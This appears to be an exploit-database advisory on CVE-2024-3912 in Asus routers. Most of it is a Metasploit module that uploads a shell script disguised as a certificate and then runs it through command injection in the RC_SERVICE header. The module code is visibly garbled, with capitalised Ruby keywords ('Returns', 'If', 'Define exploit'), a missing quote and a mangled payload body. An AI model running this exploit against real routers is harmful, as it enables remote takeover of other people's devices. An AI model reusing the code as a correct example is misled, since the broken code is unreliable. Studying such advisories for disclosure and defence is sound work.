============================================================================================================================================= | # Title : Asus router Multi‑Stage Command Injection via SETROOTCERTIFICATE Leading to Remote Command Execution | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) | | # Vendor : https://router.asus.com/ | ============================================================================================================================================= [+] Summary : A multi‑stage command injection vulnerability CVE-2024-3912 allows an attacker to achieve remote command execution on a vulnerable device by abusing the SETROOTCERTIFICATE and APPLYAPP HTTP methods. In the first stage, a malicious shell script is uploaded to the target system disguised as a certificate file through the SETROOTCERTIFICATE request. The uploaded content is written to the filesystem where it can later be executed. In the second stage, the attacker triggers command execution by injecting a shell command into the RC_SERVICE header using the APPLYAPP request, which executes the previously uploaded script. Successful exploitation results in arbitrary command execution with the privileges of the affected service. [+] POC : ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Multi-Stage Command Injection Exploit (SETROOTCERTIFICATE)', 'Description' => %q{ This module exploits a multi-stage command injection vulnerability. Stage 1: Loads a script disguised as a certificate. Stage 2: Executes the script via RC_SERVICE command injection. }, 'Author' => [ 'indoushka' ], 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [ ['Generic Device', {}] ], 'DefaultTarget' => 0, 'DisclosureDate' => '2026-03-07' )) register_options( [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL/TLS', true]) ] ) end def check print_status("Checking the target's response...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/') }) Returns CheckCode::Unknown unless res If res.code == 200 Returns CheckCode::Detected End CheckCode::Safe End Define exploit payload_body = <<~XML -----Beginning of private RSA key-----id -----Beginning of certificate----- XML print_status("Phase 1: Load payload via SETROOTCERTIFICATE") res = send_request_cgi({ 'method' => 'SETROOTCERTIFICATE', 'uri' => normalize_uri(target_uri.path, '/favicon.ico/'), 'data' => payload_body }, 20) unless res fail_with(Failure::Unreachable, "No response received from target") end print_good("Payload complete") Rex.sleep(1) print_status("Phase 2: Starting execution via APPLYAPP") res = send_request_cgi({ 'method' => 'APPLYAPP', uri' => normalize_uri(target_uri.path, '/favicon.ico/'), 'headers' => { 'ACTION_MODE' => 'apply', 'SET_NVRAM' => 'aa', 'RC_SERVICE' => '`sh /etc/cert.pem.1`' } }, 20) unless res fail_with(Failure::Unreachable, "No response received during execution") end print_good("Exploitation request sent successfully") end end Greetings to :============================================================================== jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)| ============================================================================================